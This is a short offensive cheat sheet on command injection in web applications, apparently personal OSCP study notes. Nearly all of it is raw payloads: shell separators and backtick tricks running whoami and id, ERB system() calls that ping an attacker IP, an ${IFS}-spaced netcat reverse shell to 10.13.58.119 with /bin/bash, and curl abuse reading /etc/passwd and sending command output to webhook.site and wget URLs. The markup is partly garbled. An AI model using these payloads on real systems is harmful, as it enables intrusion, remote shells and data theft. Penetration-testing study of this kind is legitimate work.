// notes/ Web Exploitation
🕸️
Command Injection
<pre<code; whoami;asd
#web applications#adot8
source · oscp.adot8.com · web-applications/command-injection ↗Command injection
<pre><code>; whoami;asd & whoami # && whoami ; whoami ; \nwhoami\n \n/bin/whoami\n <strong>\nwhoami; </strong>`whoami` `/bin/whoami` ;system('id') ;system('/usr/bin/id') %0a id %0a %0a id <%=system("ping+10.10.14.22");%> <%25%3dsystem("ping%2b10.10.14.22")%3b%25> </code></pre>Using {IFS} when spaces aren't allowed
code
01`cat${IFS}file.txt`02`./nc${IFS}10.13.58.119${IFS}1337${IFS}-e${IFS}/bin/bash`Exploitation of curl
code
01file:///etc/passwd02fileAdot803ftp://10.10.14.704gopher://10.10.14.705https://webhook.site/<id>/`whoami`06https://webhook.site/<id>?`whoami`07https://adot8.com \n wget http://10.10.14.7/`whoami`